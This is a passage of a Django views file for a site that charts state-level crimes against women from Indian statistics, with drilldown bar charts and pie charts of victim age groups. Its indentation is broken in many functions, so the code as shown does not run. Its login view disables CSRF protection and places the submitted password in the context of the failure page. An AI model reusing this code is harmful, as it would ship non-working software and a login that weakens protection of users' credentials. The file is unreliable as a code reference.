            # under zero-padded keys crimes00..crimes38 / array00..array38,
            # the names the template references individually.
            for i, crime in enumerate(crimes):
                thevalues['crimes%02d' % i] = crime
                thevalues['array%02d' % i] = array[0][i] * 100
template = loader.get_template('ML/ml.html')
return HttpResponse(template.render(thevalues, request))
    else:
        form = sf()
    # Render the form for GET requests; an invalid POST also falls through to
    # this render so the user sees the bound form again.
    return render(request, "sf.html", {'form': form})
def add(request):
if request.method == "POST":
form = caw(request.POST)
if form.is_valid():
model_instance = form.save(commit=False)
model_instance.timestamp = timezone.now()
model_instance.save()
template = loader.get_template('index.html')
return HttpResponse(template.render())
else:
template = loader.get_template('wrong/wrong-caw.html')
return HttpResponse(template.render())
else:
form = caw()
return render(request, "caw.html", {'form': form})
def addmv(request):
if request.method == "POST":
form = mv(request.POST)
if form.is_valid():
model_instance = form.save(commit=False)
model_instance.timestamp = timezone.now()
model_instance.save()
template = loader.get_template('index.html')
return HttpResponse(template.render())
else:
template = loader.get_template('wrong/wrong-murder.html')
return HttpResponse(template.render())
else:
form = mv()
return render(request, "mv.html", {'form': form})
@csrf_exempt
def login(request):
    # handle a login form submission
    if request.method == 'POST':
        # read the submitted credentials
        name = request.POST.get('name')
        passwd = request.POST.get('passwd')
        # collect the values in a context variable for the failure template
context = {
'name': name,
'passwd': passwd
}
        user = authenticate(username=name, password=passwd)
        if user is not None:
            auth_login(request, user)  # establish the session for the user
            template = loader.get_template('index.html')
            return HttpResponse(template.render())
        else:
            template = loader.get_template('portfolio-page.html')
            # returning the failure template with the submitted values
            return HttpResponse(template.render(context, request))
else:
        # not a POST request: return the login form template
template = loader.get_template('login.html')
return HttpResponse(template.render())
def redi(request):
return redirect('/login')
def register(request):
if request.method =='POST':
form = UserCreationForm(request.POST)
if form.is_valid():
form.save()
return redirect('/index#')
else:
template = loader.get_template('wrong/wrong-register.html')
return HttpResponse(template.render())
else:
form = UserCreationForm()
args = {'form': form}
return render(request, 'reg.html', args)
def page1(request):
template = loader.get_template('pages/page1.html')
return HttpResponse(template.render())
def wrtstate(request):
template = loader.get_template('womenn.html')
return HttpResponse(template.render())
def murders(request):
template = loader.get_template('wrtstate.html')
return HttpResponse(template.render())
from fusioncharts import FusionCharts
def chart2001(request):
year = '2001'
dataSource = {}
dataSource['chart'] = {
"caption": "Click on each State for a Subgroup Analysis",
"xAxisName": "Name of the State",
"yAxisName": "Number of Reported crimes against women",
"theme": "ocean",
"paletteColors" : "#0075c2",
"bgColor" : "#ffffff",
"borderAlpha": "20",
"canvasBorderAlpha": "0",
"usePlotGradientColor": "0",
"plotBorderAlpha": "10",
"showXAxisLine": "1",
"xAxisLineColor" : "#999999",
"showValues" : "0",
"divlineColor" : "#999999",
"divLineIsDashed" : "1",
"showAlternateHGridColor" : "0"
}
dataSource['data'] = []
dataSource['linkeddata'] = []
    # Iterate over the state-level totals (Subgroup = "Total Rape Victims") and fill `dataSource['data']`.
for key in crimes_against_women.objects.all().filter(Year = 2001, Subgroup="Total Rape Victims"):
data = {}
data['label'] = key.Area_Name
data['value'] = key.Rape_Cases_Reported
data['link'] = 'newchart-json-'+ key.Area_Name
dataSource['data'].append(data)
        # Create the linkData entry for this state's drilldown chart.
        linkData = {}
        linkData['id'] = key.Area_Name
linkedchart = {}
linkedchart['chart'] = {
"caption" : "Analysis of the subgroups of the Crime in - " + key.Area_Name ,
"showValues": "0",
"theme": "zune"
}
        # Convert this state's subgroup rows into the format FusionCharts expects.
        linkedchart['data'] = []
        # Filter the subgroup records for the same year and state.
        for key in crimes_against_women.objects.all().filter(Year = 2001, Area_Name=key.Area_Name):
            arrData = {}
            arrData['label'] = key.Subgroup
            arrData['value'] = key.Rape_Cases_Reported
            linkedchart['data'].append(arrData)
        linkData['linkedchart'] = linkedchart
        dataSource['linkeddata'].append(linkData)
# Create an object for the Column 2D chart using the FusionCharts class constructor
column2D = FusionCharts("column2D", "ex1" , "1200", "600", "chart-1", "json", dataSource)
    return render(request, 'women/2001.html', {'output': column2D.render(), 'year': year})
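
# Drilldown wiring used by chart2001-chart2006: each parent bar carries
# 'link': 'newchart-json-<Area_Name>', which FusionCharts resolves against the
# dataSource['linkeddata'] entry whose 'id' matches, rendering that state's
# subgroup breakdown as the child chart.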
def chart2002(request):
dataSource = {}
dataSource['chart'] = {
"caption": "Click on each State for a Subgroup Analysis",
"xAxisName": "Name of the State",
"yAxisName": "Number of Reported crimes against women",
"theme": "ocean",
"paletteColors" : "#0075c2",
"bgColor" : "#ffffff",
"borderAlpha": "20",
"canvasBorderAlpha": "0",
"usePlotGradientColor": "0",
"plotBorderAlpha": "10",
"showXAxisLine": "1",
"xAxisLineColor" : "#999999",
"showValues" : "0",
"divlineColor" : "#999999",
"divLineIsDashed" : "1",
"showAlternateHGridColor" : "0"
}
dataSource['data'] = []
dataSource['linkeddata'] = []
    # Iterate over the state-level totals (Subgroup = "Total Rape Victims") and fill `dataSource['data']`.
for key in crimes_against_women.objects.all().filter(Year = 2002, Subgroup="Total Rape Victims"):
data = {}
data['label'] = key.Area_Name
data['value'] = key.Rape_Cases_Reported
data['link'] = 'newchart-json-'+ key.Area_Name
dataSource['data'].append(data)
        # Create the linkData entry for this state's drilldown chart.
        linkData = {}
        linkData['id'] = key.Area_Name
linkedchart = {}
linkedchart['chart'] = {
"caption" : "Analysis of the subgroups of the Crime in - " + key.Area_Name ,
"showValues": "0",
"theme": "zune"
}
        # Convert this state's subgroup rows into the format FusionCharts expects.
        linkedchart['data'] = []
        # Filter the subgroup records for the same year and state.
        for key in crimes_against_women.objects.all().filter(Year = 2002, Area_Name=key.Area_Name):
            arrData = {}
            arrData['label'] = key.Subgroup
            arrData['value'] = key.Rape_Cases_Reported
            linkedchart['data'].append(arrData)
        linkData['linkedchart'] = linkedchart
        dataSource['linkeddata'].append(linkData)
# Create an object for the Column 2D chart using the FusionCharts class constructor
column2D = FusionCharts("column2D", "ex1" , "1200", "600", "chart-1", "json", dataSource)
return render(request, 'women/2002.html', {'output': column2D.render()})
def chart2003(request):
dataSource = {}
dataSource['chart'] = {
"caption": "Click on each State for a Subgroup Analysis",
"xAxisName": "Name of the State",
"yAxisName": "Number of Reported crimes against women",
"theme": "ocean",
"paletteColors" : "#0075c2",
"bgColor" : "#ffffff",
"borderAlpha": "20",
"canvasBorderAlpha": "0",
"usePlotGradientColor": "0",
"plotBorderAlpha": "10",
"showXAxisLine": "1",
"xAxisLineColor" : "#999999",
"showValues" : "0",
"divlineColor" : "#999999",
"divLineIsDashed" : "1",
"showAlternateHGridColor" : "0"
}
dataSource['data'] = []
dataSource['linkeddata'] = []
    # Iterate over the state-level totals (Subgroup = "Total Rape Victims") and fill `dataSource['data']`.
for key in crimes_against_women.objects.all().filter(Year = 2003, Subgroup="Total Rape Victims"):
data = {}
data['label'] = key.Area_Name
data['value'] = key.Rape_Cases_Reported
data['link'] = 'newchart-json-'+ key.Area_Name
dataSource['data'].append(data)
        # Create the linkData entry for this state's drilldown chart.
        linkData = {}
        linkData['id'] = key.Area_Name
linkedchart = {}
linkedchart['chart'] = {
"caption" : "Analysis of the subgroups of the Crime in - " + key.Area_Name ,
"showValues": "0",
"theme": "zune"
}
        # Convert this state's subgroup rows into the format FusionCharts expects.
        linkedchart['data'] = []
        # Filter the subgroup records for the same year and state.
        for key in crimes_against_women.objects.all().filter(Year = 2003, Area_Name=key.Area_Name):
            arrData = {}
            arrData['label'] = key.Subgroup
            arrData['value'] = key.Rape_Cases_Reported
            linkedchart['data'].append(arrData)
        linkData['linkedchart'] = linkedchart
        dataSource['linkeddata'].append(linkData)
# Create an object for the Column 2D chart using the FusionCharts class constructor
column2D = FusionCharts("column2D", "ex1" , "1200", "600", "chart-1", "json", dataSource)
return render(request, 'women/2003.html', {'output': column2D.render()})
def chart2004(request):
dataSource = {}
dataSource['chart'] = {
"caption": "Click on each State for a Subgroup Analysis",
"xAxisName": "Name of the State",
"yAxisName": "Number of Reported crimes against women",
"theme": "ocean",
"paletteColors" : "#0075c2",
"bgColor" : "#ffffff",
"borderAlpha": "20",
"canvasBorderAlpha": "0",
"usePlotGradientColor": "0",
"plotBorderAlpha": "10",
"showXAxisLine": "1",
"xAxisLineColor" : "#999999",
"showValues" : "0",
"divlineColor" : "#999999",
"divLineIsDashed" : "1",
"showAlternateHGridColor" : "0"
}
dataSource['data'] = []
dataSource['linkeddata'] = []
    # Iterate over the state-level totals (Subgroup = "Total Rape Victims") and fill `dataSource['data']`.
for key in crimes_against_women.objects.all().filter(Year = 2004, Subgroup="Total Rape Victims"):
data = {}
data['label'] = key.Area_Name
data['value'] = key.Rape_Cases_Reported
data['link'] = 'newchart-json-'+ key.Area_Name
dataSource['data'].append(data)
        # Create the linkData entry for this state's drilldown chart.
        linkData = {}
        linkData['id'] = key.Area_Name
linkedchart = {}
linkedchart['chart'] = {
"caption" : "Analysis of the subgroups of the Crime in - " + key.Area_Name ,
"showValues": "0",
"theme": "zune"
}
        linkedchart['data'] = []
        # Filter on the current state's Area_Name; a separate loop variable
        # avoids shadowing the outer `key`.
        for row in crimes_against_women.objects.filter(Year=2004, Area_Name=key.Area_Name):
            arrData = {}
            arrData['label'] = row.Subgroup
            arrData['value'] = row.Rape_Cases_Reported
            linkedchart['data'].append(arrData)
linkData['linkedchart'] = linkedchart
dataSource['linkeddata'].append(linkData)
column2D = FusionCharts("column2D", "ex1" , "1200", "600", "chart-1", "json", dataSource)
return render(request, 'women/2004.html', {'output': column2D.render()})
def chart2005(request):
dataSource = {}
dataSource['chart'] = {
"caption": "Click on each State for a Subgroup Analysis",
"xAxisName": "Name of the State",
"yAxisName": "Number of Reported crimes against women",
"theme": "ocean",
"paletteColors" : "#0075c2",
"bgColor" : "#ffffff",
"borderAlpha": "20",
"canvasBorderAlpha": "0",
"usePlotGradientColor": "0",
"plotBorderAlpha": "10",
"showXAxisLine": "1",
"xAxisLineColor" : "#999999",
"showValues" : "0",
"divlineColor" : "#999999",
"divLineIsDashed" : "1",
"showAlternateHGridColor" : "0"
}
dataSource['data'] = []
dataSource['linkeddata'] = []
    # Iterate over the `crimes_against_women` rows for this year and insert them into the `dataSource['data']` list.
for key in crimes_against_women.objects.all().filter(Year = 2005, Subgroup="Total Rape Victims"):
data = {}
data['label'] = key.Area_Name
data['value'] = key.Rape_Cases_Reported
data['link'] = 'newchart-json-'+ key.Area_Name
dataSource['data'].append(data)
        # Initialise the linkData entry for this state's drilldown chart
        linkData = {}
linkData['id'] = key.Area_Name
linkedchart = {}
linkedchart['chart'] = {
"caption" : "Analysis of the subgroups of the Crime in - " + key.Area_Name ,
"showValues": "0",
"theme": "zune"
}
        # Convert the subgroup rows for this state into the format FusionCharts expects.
        linkedchart['data'] = []
        # Filter on the current state's Area_Name; a separate loop variable
        # avoids shadowing the outer `key`.
        for row in crimes_against_women.objects.filter(Year=2005, Area_Name=key.Area_Name):
            arrData = {}
            arrData['label'] = row.Subgroup
            arrData['value'] = row.Rape_Cases_Reported
            linkedchart['data'].append(arrData)
linkData['linkedchart'] = linkedchart
dataSource['linkeddata'].append(linkData)
# Create an object for the Column 2D chart using the FusionCharts class constructor
column2D = FusionCharts("column2D", "ex1" , "1200", "600", "chart-1", "json", dataSource)
return render(request, 'women/2005.html', {'output': column2D.render()})
def chart2006(request):
dataSource = {}
dataSource['chart'] = {
"caption": "Click on each State for a Subgroup Analysis",
"xAxisName": "Name of the State",
"yAxisName": "Number of Reported crimes against women",
"theme": "ocean",
"paletteColors" : "#0075c2",
"bgColor" : "#ffffff",
"borderAlpha": "20",
"canvasBorderAlpha": "0",
"usePlotGradientColor": "0",
"plotBorderAlpha": "10",
"showXAxisLine": "1",
"xAxisLineColor" : "#999999",
"showValues" : "0",
"divlineColor" : "#999999",
"divLineIsDashed" : "1",
"showAlternateHGridColor" : "0"
}
dataSource['data'] = []
dataSource['linkeddata'] = []
    # Iterate over the `crimes_against_women` rows for this year and insert them into the `dataSource['data']` list.
for key in crimes_against_women.objects.all().filter(Year = 2006, Subgroup="Total Rape Victims"):
data = {}
data['label'] = key.Area_Name
data['value'] = key.Rape_Cases_Reported
data['link'] = 'newchart-json-'+ key.Area_Name
dataSource['data'].append(data)
        # Initialise the linkData entry for this state's drilldown chart
        linkData = {}
linkData['id'] = key.Area_Name
linkedchart = {}
linkedchart['chart'] = {
"caption" : "Analysis of the subgroups of the Crime in - " + key.Area_Name ,
"showValues": "0",
"theme": "zune"
}
        # Convert the subgroup rows for this state into the format FusionCharts expects.
        linkedchart['data'] = []
        # Filter on the current state's Area_Name; a separate loop variable
        # avoids shadowing the outer `key`.
        for row in crimes_against_women.objects.filter(Year=2006, Area_Name=key.Area_Name):
            arrData = {}
            arrData['label'] = row.Subgroup
            arrData['value'] = row.Rape_Cases_Reported
            linkedchart['data'].append(arrData)
linkData['linkedchart'] = linkedchart
dataSource['linkeddata'].append(linkData)
# Create an object for the Column 2D chart using the FusionCharts class constructor
column2D = FusionCharts("column2D", "ex1" , "1200", "600", "chart-1", "json", dataSource)
return render(request, 'women/2006.html', {'output': column2D.render()})
def chart2007(request):
dataSource = {}
dataSource['chart'] = {
"caption": "Click on each State for a Subgroup Analysis",
"xAxisName": "Name of the State",
"yAxisName": "Number of Reported crimes against women",
"theme": "ocean",
"paletteColors" : "#0075c2",
"bgColor" : "#ffffff",
"borderAlpha": "20",
"canvasBorderAlpha": "0",
"usePlotGradientColor": "0",
"plotBorderAlpha": "10",
"showXAxisLine": "1",
"xAxisLineColor" : "#999999",
"showValues" : "0",
"divlineColor" : "#999999",
"divLineIsDashed" : "1",
"showAlternateHGridColor" : "0"
}
dataSource['data'] = []
dataSource['linkeddata'] = []
    # Iterate over the `crimes_against_women` rows for this year and insert them into the `dataSource['data']` list.
for key in crimes_against_women.objects.all().filter(Year = 2007, Subgroup="Total Rape Victims"):
data = {}
data['label'] = key.Area_Name
data['value'] = key.Rape_Cases_Reported
data['link'] = 'newchart-json-'+ key.Area_Name
dataSource['data'].append(data)
        # Initialise the linkData entry for this state's drilldown chart
        linkData = {}
linkData['id'] = key.Area_Name
linkedchart = {}
linkedchart['chart'] = {
"caption" : "Analysis of the subgroups of the Crime in - " + key.Area_Name ,
"showValues": "0",
"theme": "zune"
}
        # Convert the subgroup rows for this state into the format FusionCharts expects.
        linkedchart['data'] = []
        # Filter on the current state's Area_Name; a separate loop variable
        # avoids shadowing the outer `key`.
        for row in crimes_against_women.objects.filter(Year=2007, Area_Name=key.Area_Name):
            arrData = {}
            arrData['label'] = row.Subgroup
            arrData['value'] = row.Rape_Cases_Reported
            linkedchart['data'].append(arrData)
linkData['linkedchart'] = linkedchart
dataSource['linkeddata'].append(linkData)
# Create an object for the Column 2D chart using the FusionCharts class constructor
column2D = FusionCharts("column2D", "ex1" , "1200", "600", "chart-1", "json", dataSource)
return render(request, 'women/2007.html', {'output': column2D.render()})
def chart2008(request):
dataSource = {}
dataSource['chart'] = {
"caption": "Click on each State for a Subgroup Analysis",
"xAxisName": "Name of the State",
"yAxisName": "Number of Reported crimes against women",
"theme": "ocean",
"paletteColors" : "#0075c2",
"bgColor" : "#ffffff",
"borderAlpha": "20",
"canvasBorderAlpha": "0",
"usePlotGradientColor": "0",
"plotBorderAlpha": "10",
"showXAxisLine": "1",
"xAxisLineColor" : "#999999",
"showValues" : "0",
"divlineColor" : "#999999",
"divLineIsDashed" : "1",
"showAlternateHGridColor" : "0"
}
dataSource['data'] = []
dataSource['linkeddata'] = []
    # Iterate over the `crimes_against_women` rows for this year and insert them into the `dataSource['data']` list.
for key in crimes_against_women.objects.all().filter(Year = 2008, Subgroup="Total Rape Victims"):
data = {}
data['label'] = key.Area_Name
data['value'] = key.Rape_Cases_Reported
data['link'] = 'newchart-json-'+ key.Area_Name
dataSource['data'].append(data)
        # Initialise the linkData entry for this state's drilldown chart
        linkData = {}
linkData['id'] = key.Area_Name
linkedchart = {}
linkedchart['chart'] = {
"caption" : "Analysis of the subgroups of the Crime in - " + key.Area_Name ,
"showValues": "0",
"theme": "zune"
}
        # Convert the subgroup rows for this state into the format FusionCharts expects.
        linkedchart['data'] = []
        # Filter on the current state's Area_Name; a separate loop variable
        # avoids shadowing the outer `key`.
        for row in crimes_against_women.objects.filter(Year=2008, Area_Name=key.Area_Name):
            arrData = {}
            arrData['label'] = row.Subgroup
            arrData['value'] = row.Rape_Cases_Reported
            linkedchart['data'].append(arrData)
linkData['linkedchart'] = linkedchart
dataSource['linkeddata'].append(linkData)
# Create an object for the Column 2D chart using the FusionCharts class constructor
column2D = FusionCharts("column2D", "ex1" , "1200", "600", "chart-1", "json", dataSource)
return render(request, 'women/2008.html', {'output': column2D.render()})
def chart2009(request):
dataSource = {}
dataSource['chart'] = {
"caption": "Click on each State for a Subgroup Analysis",
"xAxisName": "Name of the State",
"yAxisName": "Number of Reported crimes against women",
"theme": "ocean",
"paletteColors" : "#0075c2",
"bgColor" : "#ffffff",
"borderAlpha": "20",
"canvasBorderAlpha": "0",
"usePlotGradientColor": "0",
"plotBorderAlpha": "10",
"showXAxisLine": "1",
"xAxisLineColor" : "#999999",
"showValues" : "0",
"divlineColor" : "#999999",
"divLineIsDashed" : "1",
"showAlternateHGridColor" : "0"
}
dataSource['data'] = []
dataSource['linkeddata'] = []
    # Iterate over the `crimes_against_women` rows for this year and insert them into the `dataSource['data']` list.
for key in crimes_against_women.objects.all().filter(Year = 2009, Subgroup="Total Rape Victims"):
data = {}
data['label'] = key.Area_Name
data['value'] = key.Rape_Cases_Reported
data['link'] = 'newchart-json-'+ key.Area_Name
dataSource['data'].append(data)
        # Initialise the linkData entry for this state's drilldown chart
        linkData = {}
linkData['id'] = key.Area_Name
linkedchart = {}
linkedchart['chart'] = {
"caption" : "Analysis of the subgroups of the Crime in - " + key.Area_Name ,
"showValues": "0",
"theme": "zune"
}
        # Convert the subgroup rows for this state into the format FusionCharts expects.
        linkedchart['data'] = []
        # Filter on the current state's Area_Name; a separate loop variable
        # avoids shadowing the outer `key`.
        for row in crimes_against_women.objects.filter(Year=2009, Area_Name=key.Area_Name):
            arrData = {}
            arrData['label'] = row.Subgroup
            arrData['value'] = row.Rape_Cases_Reported
            linkedchart['data'].append(arrData)
linkData['linkedchart'] = linkedchart
dataSource['linkeddata'].append(linkData)
# Create an object for the Column 2D chart using the FusionCharts class constructor
column2D = FusionCharts("column2D", "ex1" , "1200", "600", "chart-1", "json", dataSource)
return render(request, 'women/2009.html', {'output': column2D.render()})
def chart2010(request):
dataSource = {}
dataSource['chart'] = {
"caption": "Click on each State for a Subgroup Analysis",
"xAxisName": "Name of the State",
"yAxisName": "Number of Reported crimes against women",
"theme": "ocean",
"paletteColors" : "#0075c2",
"bgColor" : "#ffffff",
"borderAlpha": "20",
"canvasBorderAlpha": "0",
"usePlotGradientColor": "0",
"plotBorderAlpha": "10",
"showXAxisLine": "1",
"xAxisLineColor" : "#999999",
"showValues" : "0",
"divlineColor" : "#999999",
"divLineIsDashed" : "1",
"showAlternateHGridColor" : "0"
}
dataSource['data'] = []
dataSource['linkeddata'] = []
    # Iterate over the `crimes_against_women` rows for this year and insert them into the `dataSource['data']` list.
for key in crimes_against_women.objects.all().filter(Year = 2010, Subgroup="Total Rape Victims"):
data = {}
data['label'] = key.Area_Name
data['value'] = key.Rape_Cases_Reported
data['link'] = 'newchart-json-'+ key.Area_Name
dataSource['data'].append(data)
        # Initialise the linkData entry for this state's drilldown chart
        linkData = {}
linkData['id'] = key.Area_Name
linkedchart = {}
linkedchart['chart'] = {
"caption" : "Analysis of the subgroups of the Crime in - " + key.Area_Name ,
"showValues": "0",
"theme": "zune"
}
        # Convert the subgroup rows for this state into the format FusionCharts expects.
        linkedchart['data'] = []
        # Filter on the current state's Area_Name; a separate loop variable
        # avoids shadowing the outer `key`.
        for row in crimes_against_women.objects.filter(Year=2010, Area_Name=key.Area_Name):
            arrData = {}
            arrData['label'] = row.Subgroup
            arrData['value'] = row.Rape_Cases_Reported
            linkedchart['data'].append(arrData)
linkData['linkedchart'] = linkedchart
dataSource['linkeddata'].append(linkData)
# Create an object for the Column 2D chart using the FusionCharts class constructor
column2D = FusionCharts("column2D", "ex1" , "1200", "600", "chart-1", "json", dataSource)
return render(request, 'women/2010.html', {'output': column2D.render()})
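# --- Hedged refactor sketch (not part of the original app) -----------------
# The ten chartYYYY views above differ only in the hard-coded year and the
# template name, so a single parameterized view could replace them. The name
# `chart_year`, the `BASE_CHART_OPTIONS` dict, and the implied URL wiring are
# hypothetical; the sketch assumes the existing model and templates unchanged.
BASE_CHART_OPTIONS = {
    "caption": "Click on each State for a Subgroup Analysis",
    "xAxisName": "Name of the State",
    "yAxisName": "Number of Reported crimes against women",
    "theme": "ocean",
}

def chart_year(request, year):
    dataSource = {'chart': BASE_CHART_OPTIONS, 'data': [], 'linkeddata': []}
    for state in crimes_against_women.objects.filter(Year=year, Subgroup="Total Rape Victims"):
        # Top-level column per state, linked to its drilldown chart.
        dataSource['data'].append({
            'label': state.Area_Name,
            'value': state.Rape_Cases_Reported,
            'link': 'newchart-json-' + state.Area_Name,
        })
        subgroups = crimes_against_women.objects.filter(Year=year, Area_Name=state.Area_Name)
        dataSource['linkeddata'].append({
            'id': state.Area_Name,
            'linkedchart': {
                'chart': {'caption': "Analysis of the subgroups of the Crime in - " + state.Area_Name,
                          'showValues': "0", 'theme': "zune"},
                'data': [{'label': s.Subgroup, 'value': s.Rape_Cases_Reported} for s in subgroups],
            },
        })
    column2D = FusionCharts("column2D", "ex1", "1200", "600", "chart-1", "json", dataSource)
    return render(request, 'women/%d.html' % year, {'output': column2D.render()})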
def pie2001(request):
data = pd.read_csv('20_Victims_of_rape.csv')
var1 = 2001
df = data[(data['Year'] == 2001)]
top = [sum(df['Victims_Above_50_Yrs']),
sum(df['Victims_Between_10to14_Yrs']),
sum(df['Victims_Between_14to18_Yrs']),
sum(df['Victims_Between_18to30_Yrs']),
sum(df['Victims_Between_30to50_Yrs']),
sum(df['Victims_Upto_10_Yrs'])
]
value = ['Victims_Above_50_Yrs','Victims_Between_10-14_Yrs','Victims_Between_14-18_Yrs','Victims_Between_18-30_Yrs','Victims_Between_30-50_Yrs','Victims_Upto_10_Yrs']
dataSource = {}
dataSource['chart'] = {
"caption": "Analysis of the victims age distribution",
"subCaption": "Crimes Against women",
"theme": "zune"
}
dataSource['data'] = []
    # Iterate over the six age buckets and insert them into the `dataSource['data']` list.
for key in range(0,6):
data = {}
data['label'] = value[key]
data['value'] = float(top[key])
dataSource['data'].append(data)
    # Return the complete JavaScript and HTML code used to render the chart in the browser.
pie3d = FusionCharts("pie3d", "ex2" , "100%", "500", "chart-1", "json",dataSource)
return render(request, 'women/pie2001.html', {'output' : pie3d.render(), 'var1':var1})
def pie2002(request):
data = pd.read_csv('20_Victims_of_rape.csv')
var1 = 2002
df = data[(data['Year'] == 2002)]
top = [sum(df['Victims_Above_50_Yrs']),
sum(df['Victims_Between_10to14_Yrs']),
sum(df['Victims_Between_14to18_Yrs']),
sum(df['Victims_Between_18to30_Yrs']),
sum(df['Victims_Between_30to50_Yrs']),
sum(df['Victims_Upto_10_Yrs'])
]
value = ['Victims_Above_50_Yrs','Victims_Between_10-14_Yrs','Victims_Between_14-18_Yrs','Victims_Between_18-30_Yrs','Victims_Between_30-50_Yrs','Victims_Upto_10_Yrs']
dataSource = {}
dataSource['chart'] = {
"caption": "Analysis of the victims age distribution",
"subCaption": "Crimes Against women",
"theme": "zune"
}
dataSource['data'] = []
    # Iterate over the six age buckets and insert them into the `dataSource['data']` list.
for key in range(0,6):
data = {}
data['label'] = value[key]
data['value'] = float(top[key])
dataSource['data'].append(data)
    # Return the complete JavaScript and HTML code used to render the chart in the browser.
pie3d = FusionCharts("pie3d", "ex2" , "100%", "500", "chart-1", "json",dataSource)
return render(request, 'women/pie2001.html', {'output' : pie3d.render(), 'var1':var1})
def pie2003(request):
data = pd.read_csv('20_Victims_of_rape.csv')
var1 = 2003
df = data[(data['Year'] == 2003)]
top = [sum(df['Victims_Above_50_Yrs']),
sum(df['Victims_Between_10to14_Yrs']),
sum(df['Victims_Between_14to18_Yrs']),
sum(df['Victims_Between_18to30_Yrs']),
sum(df['Victims_Between_30to50_Yrs']),
sum(df['Victims_Upto_10_Yrs'])
]
value = ['Victims_Above_50_Yrs','Victims_Between_10-14_Yrs','Victims_Between_14-18_Yrs','Victims_Between_18-30_Yrs','Victims_Between_30-50_Yrs','Victims_Upto_10_Yrs']
dataSource = {}
dataSource['chart'] = {
"caption": "Analysis of the victims age distribution",
"subCaption": "Crimes Against women",
"theme": "zune"
}
dataSource['data'] = []
    # Iterate over the six age buckets and insert them into the `dataSource['data']` list.
for key in range(0,6):
data = {}
data['label'] = value[key]
data['value'] = float(top[key])
dataSource['data'].append(data)
    # Return the complete JavaScript and HTML code used to render the chart in the browser.
pie3d = FusionCharts("pie3d", "ex2" , "100%", "500", "chart-1", "json",dataSource)
return render(request, 'women/pie2001.html', {'output' : pie3d.render(), 'var1':var1})
def pie2004(request):
data = pd.read_csv('20_Victims_of_rape.csv')
var1 = 2004
df = data[(data['Year'] == 2004)]
top = [sum(df['Victims_Above_50_Yrs']),
sum(df['Victims_Between_10to14_Yrs']),
sum(df['Victims_Between_14to18_Yrs']),
sum(df['Victims_Between_18to30_Yrs']),
sum(df['Victims_Between_30to50_Yrs']),
sum(df['Victims_Upto_10_Yrs'])
]
value = ['Victims_Above_50_Yrs','Victims_Between_10-14_Yrs','Victims_Between_14-18_Yrs','Victims_Between_18-30_Yrs','Victims_Between_30-50_Yrs','Victims_Upto_10_Yrs']
dataSource = {}
dataSource['chart'] = {
"caption": "Analysis of the victims age distribution",
"subCaption": "Crimes Against women",
"theme": "zune"
}
dataSource['data'] = []
    # Iterate over the six age buckets and insert them into the `dataSource['data']` list.
for key in range(0,6):
data = {}
data['label'] = value[key]
data['value'] = float(top[key])
dataSource['data'].append(data)
    # Return the complete JavaScript and HTML code used to render the chart in the browser.
pie3d = FusionCharts("pie3d", "ex2" , "100%", "500", "chart-1", "json",dataSource)
return render(request, 'women/pie2001.html', {'output' : pie3d.render(), 'var1':var1})
def pie2005(request):
data = pd.read_csv('20_Victims_of_rape.csv')
var1 = 2005
df = data[(data['Year'] == 2005)]
top = [sum(df['Victims_Above_50_Yrs']),
sum(df['Victims_Between_10to14_Yrs']),
sum(df['Victims_Between_14to18_Yrs']),
sum(df['Victims_Between_18to30_Yrs']),
sum(df['Victims_Between_30to50_Yrs']),
sum(df['Victims_Upto_10_Yrs'])
]
value = ['Victims_Above_50_Yrs','Victims_Between_10-14_Yrs','Victims_Between_14-18_Yrs','Victims_Between_18-30_Yrs','Victims_Between_30-50_Yrs','Victims_Upto_10_Yrs']
dataSource = {}
dataSource['chart'] = {
"caption": "Analysis of the victims age distribution",
"subCaption": "Crimes Against women",
"theme": "zune"
}
dataSource['data'] = []
    # Iterate over the six age buckets and insert them into the `dataSource['data']` list.
for key in range(0,6):
data = {}
data['label'] = value[key]
data['value'] = float(top[key])
dataSource['data'].append(data)
    # Return the complete JavaScript and HTML code used to render the chart in the browser.
pie3d = FusionCharts("pie3d", "ex2" , "100%", "500", "chart-1", "json",dataSource)
return render(request, 'women/pie2001.html', {'output' : pie3d.render(), 'var1':var1})
def pie2006(request):
data = pd.read_csv('20_Victims_of_rape.csv')
var1 = 2006
df = data[(data['Year'] == 2006)]
top = [sum(df['Victims_Above_50_Yrs']),
sum(df['Victims_Between_10to14_Yrs']),
sum(df['Victims_Between_14to18_Yrs']),
sum(df['Victims_Between_18to30_Yrs']),
sum(df['Victims_Between_30to50_Yrs']),
sum(df['Victims_Upto_10_Yrs'])
]
value = ['Victims_Above_50_Yrs','Victims_Between_10-14_Yrs','Victims_Between_14-18_Yrs','Victims_Between_18-30_Yrs','Victims_Between_30-50_Yrs','Victims_Upto_10_Yrs']
dataSource = {}
dataSource['chart'] = {
"caption": "Analysis of the victims age distribution",
"subCaption": "Crimes Against women",
"theme": "zune"
}
dataSource['data'] = []
    # Iterate over the six age buckets and insert them into the `dataSource['data']` list.
for key in range(0,6):
data = {}
data['label'] = value[key]
data['value'] = float(top[key])
dataSource['data'].append(data)
    # Return the complete JavaScript and HTML code used to render the chart in the browser.
pie3d = FusionCharts("pie3d", "ex2" , "100%", "500", "chart-1", "json",dataSource)
return render(request, 'women/pie2001.html', {'output' : pie3d.render(), 'var1':var1})
def pie2007(request):
data = pd.read_csv('20_Victims_of_rape.csv')
var1 = 2007
df = data[(data['Year'] == 2007)]
top = [sum(df['Victims_Above_50_Yrs']),
sum(df['Victims_Between_10to14_Yrs']),
sum(df['Victims_Between_14to18_Yrs']),
sum(df['Victims_Between_18to30_Yrs']),
sum(df['Victims_Between_30to50_Yrs']),
sum(df['Victims_Upto_10_Yrs'])
]
value = ['Victims_Above_50_Yrs','Victims_Between_10-14_Yrs','Victims_Between_14-18_Yrs','Victims_Between_18-30_Yrs','Victims_Between_30-50_Yrs','Victims_Upto_10_Yrs']
dataSource = {}
dataSource['chart'] = {
"caption": "Analysis of the victims age distribution",
"subCaption": "Crimes Against women",
"theme": "zune"
}
dataSource['data'] = []
    # Iterate over the six age buckets and insert them into the `dataSource['data']` list.
for key in range(0,6):
data = {}
data['label'] = value[key]
data['value'] = float(top[key])
dataSource['data'].append(data)
    # Return the complete JavaScript and HTML code used to render the chart in the browser.
pie3d = FusionCharts("pie3d", "ex2" , "100%", "500", "chart-1", "json",dataSource)
return render(request, 'women/pie2001.html', {'output' : pie3d.render(), 'var1':var1})
def pie2008(request):
data = pd.read_csv('20_Victims_of_rape.csv')
var1 = 2008
df = data[(data['Year'] == 2008)]
top = [sum(df['Victims_Above_50_Yrs']),
sum(df['Victims_Between_10to14_Yrs']),
sum(df['Victims_Between_14to18_Yrs']),
